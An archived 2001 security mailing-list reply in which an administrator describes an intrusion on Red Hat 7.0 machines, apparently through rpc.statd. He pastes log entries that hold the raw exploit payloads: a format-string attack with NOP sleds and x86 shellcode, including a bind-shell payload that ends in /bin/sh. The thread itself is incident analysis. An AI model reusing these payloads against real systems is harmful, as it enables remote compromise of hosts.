Security Incidents mailing list archives

Re: two machines hack through rpc.statd

From: Vegard Svanberg <vegard () SVANBERG NO>
Date: Thu, 8 Mar 2001 09:11:40 +0100

* Ryan Russell <ryan () SECURITYFOCUS COM> [2001-03-08 00:01]:

What is your evidence that he got in via rpc.statd?  There are no known
rpc.statd holes that ship with Red Hat 7.0.


Good question.  I had a lot of entries like these in the log files:

rpc.statd[382]: gethostbyname error for
^T÷ÿ¿^T÷ÿ¿^V÷ÿ¿^V÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%62716x%hn%51859x%hn
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>tõÿ¿<90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90>1Àë|Y<89>A^P<89>A^HþÀ<89>A^D<89>ÃþÀ<89>^A°fÍ<80>³^B<89>Y^LÆA^N<99>ÆA^H^P<89>I^D<80>A^D^L<88>^A°fÍ
<80>³^D°fÍ<80>³^E0À<88>A^D°fÍ<80><89>Î<88>Ã1É°?Í<80>þÁ°

A bunch of these were followed by a sudden shutdown and restart of
xinetd.  After that, an account "Vogz" was created on the system..

Of course, it could be some other exploit.  I had entries like this one
in the log file too:

SERVER[8087]: Dispatch_input: bad request line
'BBðüÿ¿ñüÿ¿òüÿ¿óüÿ¿XXXXXXXXXXXXXXXXXX0000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000004810738350880000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000006<90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>1Û1É1À°FÍ<80><89>å1Ò²f<89>Ð1É
<89>ËC<89>]øC<89>]ôK<89>Mü<8D>MôÍ<80>1É<89>EôCf<89>]ìfÇEî^O'<89>Mð<8D>Eì<89>EøÆEü^P<89>Ð<8D>MôÍ<80><89>ÐCCÍ<80><89>ÐCÍ<80><89>Ã1É²?
<89>ÐÍ<80><89>ÐAÍ<80>ë^X^<89>u^H1À<88>F^G<89>E^L°^K<89>ó<8D>M^H<8D>U^LÍ<80>èãÿÿÿ/bin/sh'

I think you'll need some logs documenting the original intrusion.  The
login after the fact might be enough.


I have logs of him logging in and out of the system, using FTP and so
on.

Do you have an estimate of damages
that you have suffered?  I.e. a Dollar (Euro) amount.


Not much.  10 hours of work or so, I guess, because I had to check the
other machines too.

Will you be making the files available?  If it is RH7, I'd be curious as
to what the rpc.stad patch was.


Unfortunately, he deleted them.  My guess is that he just upgraded the
vulnerable daemons to assure noone else could hack into the machine.

--
Vegard Svanberg <vegard () svanberg no>

Current thread:

two machines hack through rpc.statd Vegard Svanberg (Mar 07)
- Re: two machines hack through rpc.statd Ryan Russell (Mar 07)
  - Re: two machines hack through rpc.statd Vegard Svanberg (Mar 08)
- Re: two machines hack through rpc.statd Vegard Svanberg (Mar 08)
- <Possible follow-ups>
- Re: two machines hack through rpc.statd Timothy Lyons (Mar 07)
- Re: two machines hack through rpc.statd Justin Shore (Mar 07)